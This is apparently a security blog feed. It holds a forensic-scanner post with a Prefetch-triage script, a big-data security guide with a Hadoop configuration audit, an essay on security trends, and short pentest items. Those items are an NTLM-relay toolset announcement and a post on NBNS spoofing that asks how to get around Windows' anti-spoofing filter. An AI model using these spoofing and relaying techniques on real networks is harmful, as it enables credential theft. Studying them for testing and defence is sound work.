Some of the feedback I received on the presentation was pretty positive. I did chat with <a href="http://simson.net/page/Main_Page">Simson Garfinkel </a>for a few minutes after the presentation, and he had some interesting thoughts to share. The second was on making the Forensic Scanner thread-safe, so it can be multi-threaded and use multiple cores. That might make it on to the "To-Do" list, but it was Simson's first thought that I wanted to address. He suggested that at a conference where the theme seemed to revolve around analysis frameworks, I should point out the differences between the other frameworks and what I was presenting on, so I wanted to take a moment to do that.<br />
<br />
Brian presented on <a href="http://www.sleuthkit.org/autopsy/desc3.php">Autopsy 3.0</a>, and along with another presentation in the morning, discussed some of the features of the framework. There was the discussion of pipelines, and having modules to perform specific functions, etc. It's an excellent framework that has the capability of performing functions such as parsing Registry hives (utilizing RegRipper), carving files from unallocated space, etc. For more details, please see the web site. <br />
<br />
I should note that there are other open source frameworks available, as well, such as <a href="http://www.digital-forensic.org/">DFF</a>. <br />
<br />
The Forensic Scanner is...different. Neither better, nor worse...because it addresses a different problem. For example, you wouldn't use the Forensic Scanner to run a keyword search or carve unallocated space. The scanner is intended for quickly automating repetitive tasks of data collection, with some ability to either point the analyst in a particular direction, or perform a modicum of analysis along with the data presentation (depending upon how much effort you want to put into writing the plugins). So, rather than providing an open framework which an analyst can use to perform various analysis functions, the Scanner allows the analyst to perform discrete, repetitive tasks.<br />
<br />
The idea behind the scanner is this...there're things we do all the time when we first initiate our analysis. One is to collect simple information from the system...it's a Windows system, which version of Windows is it, its time zone settings, is it 32- or 64-bit, etc. We collect this information because it can significantly impact our analysis. However, keeping track of all of these things can be difficult. For example, if you're looking at an image acquired from a Windows system and don't see Prefetch files, what's your first thought? Do you check the version of Windows you're examining? Do you check the Registry values that apply to and control the system's prefetching capabilities? I've talked with examiners whose first thought is that the user must have deleted the Prefetch files...but how do you know? <br />
<br />
Rather than maintaining extensive checklists of all of these artifacts, why not simply write a plugin to collect what data it is that you want to collect, and possibly add a modicum of analysis into that plugin? One analyst writes the plugin, shares it, and anyone with that plugin will have access to the functionality without having to have had the same experiences as the analyst. You share it with all of your analysts, and they all have the capability at their fingertips. Most analysts recognize the value of the Prefetch files, but some may not work with Windows systems all of the time, and may not stay up on the "latest and greatest" in <a href="http://windowsir.blogspot.com/2012/03/prefetch-analysis-revisited.html">analysis techniques </a>that can be applied to those files. So, let's say that instead of dumping all of the module paths embedded in Prefetch files, you add some logic to search for .exe files, .dat files, and any file that includes "temp" in the path, and display that information? Or, why not create whitelists of modules over time, and have the plugin show you all modules not in that whitelist?<br />
<br />
Something that I and others have found useful is that, instead of forcing the analyst to use "profiles", as with the current version of RegRipper, the Forensic Scanner runs plugins automatically based on OS type, class, and then organizes the plugin results by category. What this means is that for the system class of plugins, all of the plugins that pertain to "Program Execution" will be grouped together; this holds true for other plugin categories, as well. This way, you don't have to go searching around for the information in which you're interested.<br />
<br />
As I stated more than once in the presentation, the Scanner is not intended to <i>replace</i> analysis; rather, it's intended to get you to the point of performing analysis much sooner. For example, I illustrated a plugin that parses a user's IE index.dat file. Under normal circumstances when performing analysis, you'd have to determine which version of Windows you were examining, determine the path to the particular index.dat file that you're interested in, and then extract it and parse it. The plugin is capable of doing all of that...in the test case, <i>all</i> of the plugins I ran against a mounted volume completed in under 2 seconds...that's scans of the system, as well as both of the selected user profiles.<br />
<br />
So...please feel free to try the Scanner. If you have any questions, you know where to <a href="mailto:keydet89@yahoo.com">reach me</a>. Just know that this is a work-in-progress, with room for growth.<br />
<br />
<b><i>Addendum</i></b><br />
Matt Presser identified an issue that the Scanner has with identifying user profiles that contain a dot. I fixed the issue and will be releasing an update once I make a couple of minor updates to other parts of the code.<br />
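The Prefetch plugin logic described above (keep only .exe and .dat modules and anything loaded from a path containing "temp", then show what is not on an analyst-maintained whitelist) as an added example. This is not part of the Forensic Scanner release and is not written against its Perl plugin API; the list of module paths stands in for what a Prefetch parser would produce, and both it and the whitelist are constructed for this example.<br />

```python
"""Added example (not part of the Forensic Scanner release): the Prefetch
module triage described in the post, applied to a constructed list of
module paths of the kind embedded in a Windows Prefetch file.  Parsing
the .pf file itself is out of scope; the list below stands in for it."""
import re

# Constructed sample: module paths in the device-path form Prefetch uses.
SAMPLE_MODULES = [
    r"\DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\NTDLL.DLL",
    r"\DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\KERNEL32.DLL",
    r"\DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\NOTEPAD.EXE",
    r"\DEVICE\HARDDISKVOLUME1\USERS\ALICE\APPDATA\LOCAL\TEMP\SETUP.EXE",
    r"\DEVICE\HARDDISKVOLUME1\USERS\ALICE\APPDATA\LOCAL\TEMP\INSTALL.DAT",
    r"\DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\UNICODE.NLS",
    r"\DEVICE\HARDDISKVOLUME1\WINDOWS\TEMP\UPDATE.DLL",
]

# Constructed whitelist: modules already reviewed and judged benign.
BASELINE_WHITELIST = {
    r"\DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\NTDLL.DLL",
    r"\DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\KERNEL32.DLL",
    r"\DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\UNICODE.NLS",
}

# .exe or .dat file name, or a path component containing "temp".
INTERESTING = re.compile(r"\.(exe|dat)$|\\[^\\]*temp[^\\]*\\", re.IGNORECASE)


def interesting_modules(modules):
    """Keep the three classes the post suggests instead of a full dump."""
    return [m for m in modules if INTERESTING.search(m)]


def unlisted_modules(modules, whitelist):
    """Modules not in the analyst's whitelist (compared case-insensitively)."""
    known = {w.upper() for w in whitelist}
    return [m for m in modules if m.upper() not in known]


def triage(modules, whitelist):
    """Report a plugin could print under its 'Program Execution' category."""
    unlisted = unlisted_modules(modules, whitelist)
    return {
        "interesting": interesting_modules(modules),
        "unlisted": unlisted,
        "interesting_and_unlisted": interesting_modules(unlisted),
    }


def extend_whitelist(whitelist, reviewed_modules):
    """Grow the whitelist over time with modules the analyst has reviewed."""
    return set(whitelist) | set(reviewed_modules)


if __name__ == "__main__":
    report = triage(SAMPLE_MODULES, BASELINE_WHITELIST)
    for section, paths in report.items():
        print(section)
        for path in paths:
            print("  " + path)
```

The whitelist comparison is case-insensitive because Prefetch stores module paths in upper case while analyst-written lists rarely are; keeping the two filters separate lets the plugin show "new and suspicious" as a third, shorter list.<br />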
Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-85202476226742765132012-10-03T07:25:00.001-07:002012-10-03T07:25:55.441-07:00Securing Big Data: Recommendations and Open Issues<a href="https://securosis.com/blog/securing-big-data-recommendations-and-open-issues">Securing Big Data: Recommendations and Open Issues</a>: <br />
Our previous two posts outlined several security issues inherent to big data <a href="https://securosis.com/blog/securing-big-data-operational-security-issues">architecture</a>, and <a href="https://securosis.com/blog/securing-big-data-architectural-issues">operational security issues</a> common to big data clusters. With those in mind, how can one go about securing a big data cluster? What tools and techniques should you employ?<br />
<br />
Before we can answer those questions we need some ground rules, because not all ‘solutions’ are created equal. Many vendors claim to offer big data security, but they are really just selling the same products they offer for other back office systems and relational databases. Those products might work in a big data cluster, but only by compromising the big data model to make it fit the restricted envelope of what they can support. Their constraints on scalability, coverage, management, and deployment are all at odds with the essential big data features we have discussed. Any security product for big data needs a few characteristics:<br />
<br />
<ol><li>It must not compromise the basic functionality of the cluster</li>
<li>It should scale in the same manner as the cluster</li>
<li>It should not compromise the essential characteristics of big data</li>
<li>It should address – or at least mitigate – a security threat to big data environments or data stored within the cluster.</li>
</ol><br />
So how can we secure big data repositories today? The following is a list of common challenges, with security measures to address them:<br />
<br />
<ul><li><strong>User access:</strong> We use identity and access management systems to control users, including both regular and administrator access.</li>
<li><strong>Separation of duties:</strong> We use a combination of authentication, authorization, and encryption to provide separation of duties between administrative personnel. We use application space, namespace, or schemata to logically segregate user access to a subset of the data under management.</li>
<li><strong>Indirect access:</strong> To close “back doors” – access to data <em>outside</em> permitted interfaces – we use a combination of encryption, access control, and configuration management.</li>
<li><strong>User activity:</strong> We use logging and user activity monitoring (where available) to alert on suspicious activity and enable forensic analysis.</li>
<li><strong>Data protection:</strong> Removal of sensitive information <em>prior</em> to insertion and data masking (via tools) are common strategies for reducing risk. But the majority of big data clusters we are aware of <em>already</em> store redundant copies of sensitive data. This means the data stored on disk must be protected against unauthorized access, and data encryption is the <em>de facto</em> method of protecting sensitive data at rest. In keeping with the requirements above, any encryption solution must scale with the cluster, must not interfere with MapReduce capabilities, and must not store keys on hard drives along with the encrypted data – keys must be handled by a secure key manager.</li>
<li><strong>Eavesdropping:</strong> We use SSL and TLS encryption to protect network communications. Hadoop offers SSL, but its implementation is limited to client connections. Cloudera offers good integration of TLS; otherwise look for third party products to close this gap.</li>
<li><strong>Name and data node protection:</strong> By default Hadoop HTTP web consoles (JobTracker, NameNode, TaskTrackers, and DataNodes) allow access without any form of authentication. The good news is that Hadoop RPC and HTTP web consoles can be configured to require Kerberos authentication. Bi-directional authentication of nodes is built into Hadoop, and available in some other big data environments as well. Hadoop’s model is built on Kerberos to authenticate applications to nodes, nodes to applications, and client requests for MapReduce and similar functions. Care must be taken to secure granting and storage of Kerberos tickets, but this is a <em>very</em> effective method for controlling what nodes and applications can participate on the cluster.</li>
<li><strong>Application protection:</strong> Big data clusters are built on web-enabled platforms – which means that remote injection, cross-site scripting, buffer overflows, and logic attacks against and through client applications are all possible avenues of attack for access to the cluster. Countermeasures typically include a mixture of secure code development practices (such as input validation, and address space randomization), network segmentation, and third-party tools (including Web Application Firewalls, IDS, authentication, and authorization). Some platforms offer built-in features to bolster application protection, such as YARN’s web application proxy service.</li>
<li><strong>Archive protection:</strong> As backups are largely an intractable problem for big data, we don’t need to worry much about traditional backup/archive security. But just because legitimate users cannot perform conventional backups does not mean an <em>attacker</em> would not create at least a partial backup. We need to secure the management plane to keep unwanted copies of data or data nodes from being propagated. Access controls, and possibly network segregation, are effective countermeasures against attackers trying to gain administrative access, and encryption can help protect data in case other protections are defeated.</li>
</ul><br />
In the end, our big data security recommendations boil down to a handful of standard tools which can be effective in setting a secure baseline for big data environments:<br />
<br />
<ol><li><strong>Use Kerberos:</strong> This is an effective method for keeping rogue nodes and applications off your cluster. And it can help protect web console access, making administrative functions harder to compromise. We know Kerberos is a pain to set up, and (re-)validation of new nodes and applications takes work. But without bi-directional trust establishment it is too easy to fool Hadoop into letting malicious applications into the cluster, or into accepting malicious nodes – which can then add, alter, or extract data. Kerberos is one of the most effective security controls at your disposal, and it’s built into the Hadoop infrastructure, so use it.</li>
<li><strong>File layer encryption:</strong> File encryption addresses two attacker methods for circumventing normal application security controls. Encryption protects in case malicious users or administrators gain access to data nodes and directly inspect files, and it also renders stolen files or disk images unreadable. Encryption protects against two of the most serious threats. Just as importantly, it meets our requirements for big data security tools – it is transparent to both Hadoop and calling applications, and scales out as the cluster grows. Open source products are available for most Linux systems; commercial products additionally offer external key management, trusted binaries, and full support. This is a cost-effective way to address several data security threats.</li>
<li><strong>Management:</strong> Deployment consistency is difficult to ensure in a multi-node environment. Patching, application configuration, updating the Hadoop stack, collecting trusted machine images, certificates, and platform discrepancies, all contribute to what can easily become a management nightmare. The good news is that most of you will be deploying in cloud and virtual environments. You can leverage tools from your cloud provider, hypervisor vendor, and third parties (such as Chef and Puppet) to automate pre-deployment tasks. Machine images, patches, and configuration should be fully automated and updated prior to deployment. You can even run validation tests, collect encryption keys, and request access tokens before nodes are accessible to the cluster. Building the scripts takes some time up front but pays for itself in reduced management time later, and additionally ensures that each node comes up with baseline security in place.</li>
<li><strong>Log it!:</strong> Big data is a natural fit for collecting and managing log data. Many web companies started with big data specifically to manage log files. Why not add logging onto your existing cluster? It gives you a place to look when something fails, or if someone thinks perhaps you have been hacked. Without an event trace you are blind. Logging MR requests and other cluster activity is easy to do, and increases storage and processing demands by a small fraction, but the data is indispensable when you need it.</li>
<li><strong>Secure communication:</strong> Implement secure communication between nodes, and between nodes and applications. This requires an SSL/TLS implementation that actually protects all network communications rather than just a subset. Cloudera appears to get this right, and some cloud providers offer secure communication options as well; otherwise you will likely need to integrate these services into your application stack.</li>
</ol><br />
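The Kerberos and secure-communication recommendations above map onto a handful of Hadoop configuration properties, and the dangerous cases are the ones where a property is simply absent and Hadoop's permissive default applies. As an added example (not from the Securosis post and not a vendor product), the Python below parses core-site/hdfs-site style XML and reports every property that is missing or weaker than a hardened baseline. The property names and defaults are the Hadoop 2.x ones, which postdate the post; the two configuration fragments and the host name are constructed.<br />

```python
"""Added example (not from the Securosis post): audit Hadoop XML
configuration for the settings behind recommendations 1 (Kerberos)
and 5 (secure communication).  Property names and defaults are the
documented Hadoop 2.x ones; the two fragments are constructed."""
import xml.etree.ElementTree as ET

# Hardened baseline.  Assumption: Hadoop 2.x property names.
REQUIRED = {
    "hadoop.security.authentication": "kerberos",  # RPC callers need a ticket
    "hadoop.security.authorization": "true",        # service-level ACLs enforced
    "hadoop.http.authentication.type": "kerberos",  # web consoles (NameNode etc.)
    "hadoop.rpc.protection": "privacy",             # RPC integrity + encryption
    "dfs.encrypt.data.transfer": "true",            # block transfers encrypted
    "dfs.http.policy": "HTTPS_ONLY",                # no plaintext web UIs
}

# Values Hadoop uses when the property is not set at all.
DEFAULTS = {
    "hadoop.security.authentication": "simple",
    "hadoop.security.authorization": "false",
    "hadoop.http.authentication.type": "simple",
    "hadoop.rpc.protection": "authentication",
    "dfs.encrypt.data.transfer": "false",
    "dfs.http.policy": "HTTP_ONLY",
}

# Constructed: a cluster that "hides in the infrastructure" with defaults.
WEAK_CONFIG = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://nn.example.test:8020</value></property>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
</configuration>"""

# Constructed: the same cluster with the baseline applied.
HARDENED_CONFIG = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://nn.example.test:8020</value></property>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.security.authorization</name><value>true</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>hadoop.rpc.protection</name><value>privacy</value></property>
  <property><name>dfs.encrypt.data.transfer</name><value>true</value></property>
  <property><name>dfs.http.policy</name><value>HTTPS_ONLY</value></property>
</configuration>"""


def parse_properties(xml_text):
    """Return {name: value} from a Hadoop <configuration> document."""
    props = {}
    for prop in ET.fromstring(xml_text).iter("property"):
        name = prop.findtext("name")
        if name is not None:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def audit(xml_text):
    """List each baseline property that is weaker than required, noting
    whether the weak value was set explicitly or came from the default."""
    props = parse_properties(xml_text)
    findings = []
    for name, wanted in REQUIRED.items():
        actual = props.get(name, DEFAULTS[name])
        if actual.lower() != wanted.lower():
            source = "set" if name in props else "default"
            findings.append(f"{name}={actual} ({source}); expected {wanted}")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        findings = audit(cfg)
        print(f"{label}: {len(findings)} finding(s)")
        for line in findings:
            print("  " + line)
```

Running the check as part of the automated node build the Management recommendation describes turns a silent default into a build failure before the node joins the cluster.<br />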
When we speak with big data architects and managers, we hear their most popular security model is to hide the cluster within their infrastructure, where attackers don’t notice it. But these repositories are now common, and lax security makes them a very attractive target. Consider the recommendations above a minimum for preventative security. And these are the <em>easy</em> security measures – they are simple, cost-effective, and scalable, and they address specific security deficiencies in big data clusters. Nothing suggested here impairs performance, scalability, or functionality. Yes, it’s more work to set up, but relatively simple to manage and maintain.<br />
<br />
Several other threats are less easily addressed. API security, monitoring, user authentication, granular data access, and gating MapReduce requests are all issues without simple answers. In some cases, such as with application security, there are simply too many variables – with security controls requiring tradeoffs that are entirely dependent upon the particular environment. Some controls, including certain types of encryption and activity monitoring, require modifications to deployments or data choke points that can slow data input to a snail’s pace. In many cases we have nothing to recommend – technologies have not yet evolved sufficiently to handle real-world big data requirements. That does not mean you cannot fill the gaps with your own solutions. But for some problems, there are no simple solutions. Our recommendations can greatly improve the overall security of big data clusters, and we highlight outstanding operational and architectural security issues to help you develop your own security measures.<br />
<br />
This concludes our short introduction to big data security. As always, please comment if you feel we missed something or feel we have gotten anything wrong. Big data security is both complex and rapidly changing; we know there are many different perspectives and encourage you to share yours.<br />
<br />
- Adrian Lane<br />
Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-91271409508039324062012-09-25T13:15:00.001-07:002012-09-25T13:15:34.843-07:00Inflection<a href="https://securosis.com/blog/inflection">Inflection</a>: <br />
Hang with me as I channel my inner Kerouac (minus the drugs, plus the page breaks) and go all stream of consciousness. To call this post an “incomplete thought” would be more than a little generous.<br />
<br />
I believe we are now deep in the early edge of a major inflection point in security. Not one based merely on evolving threats or new compliance regimes, but a fundamental transformation of the practice of security that will make it nearly unrecognizable when we finally emerge on the other side. For the past 5 years Hoff and I have discussed <em>disruptive innovation</em> in our annual RSA presentation. What we are seeing now is a <em>disruptive conflagration,</em> where multiple disruptive innovations are colliding and overlapping. It affects more than security, but that’s the only area about which I’m remotely qualified to pontificate.<br />
<br />
Perhaps that’s a bit of an exaggeration. All the core elements of what we will become are here today, and there are certain fundamentals that never change, but someone walking into the SOC or CISO role of tomorrow will find more different than the same unless they deliberately blind themselves.<br />
<br />
Unlike most of what I read out there, I don’t see these changes as merely things we in security are forced to react to. Our internal changes in practice and technology are every bit as significant contributing factors.<br />
<br />
One of the highlights of my career was once hanging out and having beers with Bruce Sterling. He said that his role as a futurist was to imagine the world 7 years out – effectively beyond the event horizon of predictability. What I am about to describe will occur over the next 5-10 years, with the most significant changes likely occurring in those last 7-10 years, but based on the roots we establish today. So this should be taken as much as science fiction as prediction.<br />
<br />
The last half of 2012 is the first 6 months of this transition. The end result, in 2022, will be far more change over 10 years than the evolution of the practice of security from 2002 through today.<br />
<br />
<hr /><br />
The first major set of disruptions includes the binary supernova of tech – cloud computing and mobility. This combination, in my mind, is more fundamentally disruptive than the initial emergence of the Internet. Think about it – for the most part the Internet was (at a technical level) merely an extension of our existing infrastructure. To this day we have tons of web applications that, through a variety of tiers, connect back to 30+-year-old mainframe applications. Consumption is still mostly tied to people sitting at computers at desks – especially conceptually.<br />
<br />
Cloud blows up the idea of merely extending existing architectures with a web portal, while mobility advances fundamentally redefine consumption of technology. Can you merely slop your plate of COBOL onto a plate of cloud? Certainly, right as you watch your competitors and customers speed past at relativistic speeds.<br />
<br />
Our tradition in security is to focus on the risks of these advances, but the more prescient among us are looking at the massive opportunities. Not that we can ignore the risks, but we won’t merely be defending these advances – our security will be defined and delivered by them. When I talk about security automation and abstraction I am not merely paying lip service to buzzwords – I honestly expect them to support new capabilities we can barely imagine today.<br />
<br />
When we leverage these tools – and we will – we move past our current static security model that relies (mostly) on following wires and plugs, and into a realm of <em>programmatic security</em>. Or, if you prefer, <em>Software Defined Security</em>. Programmers, not network engineers, become the dominant voices in our profession.<br />
<br />
<hr /><br />
Concurrently, four native security trends are poised to upend existing practice models.<br />
<br />
Today we focus tremendous effort on an infinitely escalating series of vulnerabilities and exploits. We have started to mitigate this somewhat with anti-exploitation, especially at the operating system level (thanks to Microsoft). The future of anti-exploitation is <em>hyper segregation</em>.<br />
<br />
iOS is an excellent example of the security benefits of heavily sandboxing the operating ecosystem. Emerging tools like Bromium and Invincea are applying even more advanced virtualization techniques to the same problem. Bromium goes so far as to effectively virtualize and isolate at a <em>per task</em> level. Calling this mere ‘segregation’ is trite at best.<br />
<br />
Cloud enables similar techniques at the network and application levels. When the network and infrastructure are defined in software, there is essentially zero capital cost for network and application component segregation. Even this blog, today, runs on a specially configured hyper-segregated server that’s managed at a per-process level.<br />
<br />
Hyper segregated environments – down, in some cases, to the individual process level – are rapidly becoming a practical reality, even in complex business environments with low tolerance for restriction.<br />
<br />
<hr /><br />
Although <em>incident response</em> has always technically been core to any security model, for the most part it was shoved to the back room – stuck at the kids’ table next to DRM, application security, and network segregation. No one wanted to make the case that no matter what we spent, our defenses could never <em>eliminate</em> risk. Like politicians, we were too frightened to tell our executives (our constituency) the truth. Especially those who were burned by ideological execs.<br />
<br />
Thanks to our friends in China and Eastern Europe (mostly), incident response is on the earliest edge of getting its due. Not the simple expedient of having an incident response plan, or even tools, but conceptually re-prioritizing and re-architecting our entire security programs – to focus as much or more on detection and response as on pure defense. We will finally use all those big screens hanging in the SOC to do more than impress prospects and visitors.<br />
<br />
My bold prediction? A focus on incident response, on more rapidly detecting and responding to attacker-driven incidents, will exceed our current checklist and vulnerability focused security model, affecting everything from technology decisions to budgeting and staffing.<br />
<br />
This doesn’t mean compliance will go away – over the long haul compliance standards will embrace this approach out of necessity.<br />
<br />
<hr /><br />
The next two trends technically fall under the umbrella of response, but only in the broadest use of the term.<br />
<br />
As I <a href="https://securosis.com/blog/thoughts-on-active-defense-intrusion-deception-and-counter-strikes">wrote earlier this year</a>, <em>active defense</em> is reemerging and poised to materially impact our ability to detect and manage attacks. Historically we have said that as defenders we will <em>always</em> lose – because we need to be right every time, and the attacker only needs to be right or lucky once. But that’s only true for the most simplistic definition of attack. If we look at the <a href="https://securosis.com/blog/the-data-breach-triangle/">Data Breach Triangle</a>, an attacker not only needs a way in, but something to steal and a way out.<br />
<br />
Active defense reverses the equation and forces attacker perfection, making accessing our environment only one of many steps required for a successful attack. Instead of relying on out-of-date signatures, crappy heuristics prone to false positives, or manual combing through packets and logs, we will instead build environments so laden with tripwires and landmines that they may end up being banned by a virtual Geneva Convention.<br />
<br />
Heuristic security tends to fail because it often relies on generic analysis of good and bad behavior that is difficult or impossible to model. Active defenses interact with intruders while complicating and obfuscating the underlying structure. This dynamic interaction is far more likely to properly identify and classify an attacker.<br />
<br />
Active defenses will become commonplace, and in large part replace our signature-based systems of failure.<br />
<br />
<hr /><br />
But none of this information is useful if it isn’t accurate, actionable, and appropriate, so the last major trend is <em>closing the action loop</em> (the <a href="http://en.wikipedia.org/wiki/OODA_loop">OODA loop</a> for you milspec readers). This combines <em>big data,</em> <em>visualization,</em> and <em>security orchestration</em> (a facet of our earlier automation) – to create a more responsive, manageable, and, frankly, <em>usable</em> security system.<br />
<br />
Our current tools largely fall into general functional categories that are too distinct and isolated to really meet our needs. Some tools observe our environment (<em>e.g.,</em> SIEM, DLP, and full packet capture), but they tend to focus on narrow slices – with massive gaps between tools hampering our ability to acquire related information which we need to understand incidents. From an alert, we need to jump into many different shells and command lines on multiple servers and appliances in order to see what’s really going on. When tools talk to each other, it’s rarely in a meaningful and useful way.<br />
<br />
While some tools can act with automation, it is again self-contained, uncoordinated, and (beyond the most simplistic incidents) more prone to break a business process than stop an attacker. When we want to perform a manual action, our environments are typically so segregated and complicated that we can barely manage something as simple as pushing a temporary firewall rule change.<br />
<br />
Over the past year I have seen the emergence of tools just beginning to deliver on old dreams, which were so shattered by the ugly reality of SIEM that many security managers have resorted to curling up in the fetal position during vendor presentations.<br />
<br />
These tools will combine the massive amounts of data we are currently collecting on our environments, at speeds and volumes long promised but never realized. We will steal analytics from big data; tune them for security; and architect systems that allow us to visualize our security posture, identify, and rapidly characterize incidents. From the same console we will be able to look at a high-level SIEM alert, drill down into the specifics, and analyze correlated data from multiple tools and sensors. I don’t merely mean the SNMP traps from those tools, but full incident data and <em>context</em>.<br />
<br />
No, your current SIEM doesn’t do this.<br />
<br />
But the clincher is the closer. Rather than merely looking at incident data, we will act on the data using the same console. We will review the automated responses, model the impact with additional analytics and visualization (real-time attack and defense modeling, based on near-real-time assessment data), and then tune and implement additional actions to contain, stop, and investigate the attack.<br />
<br />
Detection, investigation, analysis, orchestration, and action all from the same console.<br />
<br />
<hr /><br />
This future won’t be distributed evenly. Organizations of different sizes and markets won’t all have the same access to these resources and they do not have the same needs – and that’s okay. Smaller and medium-sized organizations will rely more on Security as a Service providers and automated tools. Larger organizations or those less willing to trust outsiders will rely more on their own security operators. But these delivery models don’t change the fundamentals of technologies and processes.<br />
<br />
Within 10 years our security will be abstracted and managed programmatically. We will focus more on detection and response – relying on powerful new tools to identify, analyze, and orchestrate responses to attacks. The cost of attacking will rise dramatically due to hyper segregation, active countermeasures, and massive increases in the complexity required for a successful attack chain.<br />
<br />
I am not naive or egotistical enough to think these broad generalities will result in a future exactly as I envision it, or on the precise timeline I envision, but all the pieces are in at least early stages today, and the results seem inevitable.<br />
<br />
- Rich<br />
(1) <a href="https://securosis.com/blog/inflection">Comments</a><br />
<br />
Posted 2012-09-04: <a href="http://feedproxy.google.com/~r/PenTestIT/~3/RTtamHWBPeY/">ZackAttack!: Firesheep for NTLM Authentication!</a>: Not BlackHat, but a goodie from Defcon this time! What Firesheep was for HTTP, ZackAttack! aims to be for NTLM authentication! Simply put, ZackAttack! is a new toolset to perform NTLM authentication relaying. NTLM is pretty much prevalent in the corporate environment. Think of all that you can leverage using ZackAttack! It uses another tool – [...]<br />
<a href="http://www.pentestit.com/zackattack-firesheep-ntlm-authentication/">ZackAttack!: Firesheep for NTLM Authentication!</a> is a post from: <a href="http://www.pentestit.com/">PenTestIT</a><br />
<br />
Posted 2012-09-04: <a href="http://feedproxy.google.com/~r/Room362com/~3/MKnLEYbPMUs/old-school-on-target-nbns-spoofing.html">Old School On-target NBNS Spoofing</a>: <br />
One of pen testers' favorite attacks is NBNS spoofing. Now Wesley, who I originally learned this attack from, traced this back to Sid (<a href="http://www.notsosecure.com/folder2/2007/03/14/abusing-tcpip-name-resolution-in-windows-to-carry-out-phishing-attacks/">http://www.notsosecure.com/folder2/2007/03/14/abusing-tcpip-name-resolution-in-windows-to-carry-out-phishing-attacks/</a>). Wesley's stuff can be found here: <a href="http://www.mcgrewsecurity.com/tools/nbnspoof/">http://www.mcgrewsecurity.com/tools/nbnspoof/</a><br />
Wesley's stuff eventually lead to this awesome post on the Packetstan blog: <a href="http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html">http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html</a><br />
and in that post the Metasploit module to do it all is demoed. But therein lies the rub. With each degree of separation we have more and more solidified it into an "on-site"-only attack. But if you read through Sid's paper from 2007, this doesn't have to be the case. He uses a tool written by "Francis Hauguet" back in 2005 for the Honeynet project: <a href="http://seclists.org/honeypots/2005/q4/46">http://seclists.org/honeypots/2005/q4/46</a> called "FakeNetbiosDGM and FakeNetbiosNS".<br />
Finding the tools was no easy task though; googling for the file name, the author, or the project just netted me this link:<br />
<a href="http://honeynet.rstack.org/tools/FakeNetBIOS-0.91.zip">http://honeynet.rstack.org/tools/FakeNetBIOS-0.91.zip</a><br />
Gotta love the Wayback Machine, I finally found it here: <a href="http://wayback.archive.org/web/*/http://honeynet.rstack.org/tools/FakeNetBIOS-0.91.zip">http://wayback.archive.org/web/*/http://honeynet.rstack.org/tools/FakeNetBIOS-0.91.zip</a><br />
and eventually also here: <a href="http://www.chambet.com/tools.html">http://www.chambet.com/tools.html</a><br />
Question is, does it still work? Second question: how well does it work through/with Meterpreter?<br />
(As a side note, I haven't tried, but you might be able to use Py2Exe or PyInstaller to run nbnspoof.py on a Windows box.)<br />
When running it on XP SP3 I get the following:<br />
<img alt="Screen Shot 2012 09 02 at 12 24 44 AM" border="0" height="499" src="http://www.room362.com/resource/Screen%20Shot%202012-09-02%20at%2012.24.44%20AM.png?fileId=20103536" title="Screen Shot 2012-09-02 at 12.24.44 AM.png" width="600" /><br />
Booooooooo, and on Windows 7 I get this:<br />
<img alt="Screen Shot 2012 09 02 at 12 29 03 AM" border="0" height="563" src="http://www.room362.com/resource/Screen%20Shot%202012-09-02%20at%2012.29.03%20AM.png?fileId=20103537" title="Screen Shot 2012-09-02 at 12.29.03 AM.png" width="600" /><br />
OK, error 10013 is a permissions issue; I can deal with that.<br />
<img alt="Screen Shot 2012 09 02 at 12 32 38 AM" border="0" height="556" src="http://www.room362.com/resource/Screen%20Shot%202012-09-02%20at%2012.32.38%20AM.png?fileId=20103538" title="Screen Shot 2012-09-02 at 12.32.38 AM.png" width="600" /><br />
Run as Administrator it works! But something is wrong with the communication, because the host doing the lookup doesn't get the correct resolution back.<br />
From what I can google it looks as though Windows Firewall has an 'Anti-Spoofing' outbound filter, so these "Bytes sent" don't even make it to Wireshark.<br />
I have created a Github repository, stuck the contents of the zip file in it, and this is where I ask for help. If you know 1) how to disable the Windows Anti-spoofing filter or 2) how to circumvent it, please leave a comment here, an issue on the repo, or email me directly.<br />
The other thing is, if you want to improve the code, that would be awesome too, submit a pull request, I'd love to get this thing going again and make it into something that we can solidly use over a Meterpreter session.<br />
Github repo: <a href="https://github.com/mubix/FakeNetBIOS">https://github.com/mubix/FakeNetBIOS</a><br />
And if the only commit to this repo 5 years from now is "Initial commit", then at the very least it will be somewhere the next blogger who picks up the trail can get it from.<br />
P.S. If you know how to solve the issue on XP, that would be an awesome fix as well.<br />
<br />
Posted 2012-08-29: <a href="http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/Tp_iEBAoxjA/waf-normalization-and-i18n.html">WAF Normalization and I18N</a>: <br />
<div><em>Submitted By Breno Silva Pinto and Ryan Barnett</em><br />
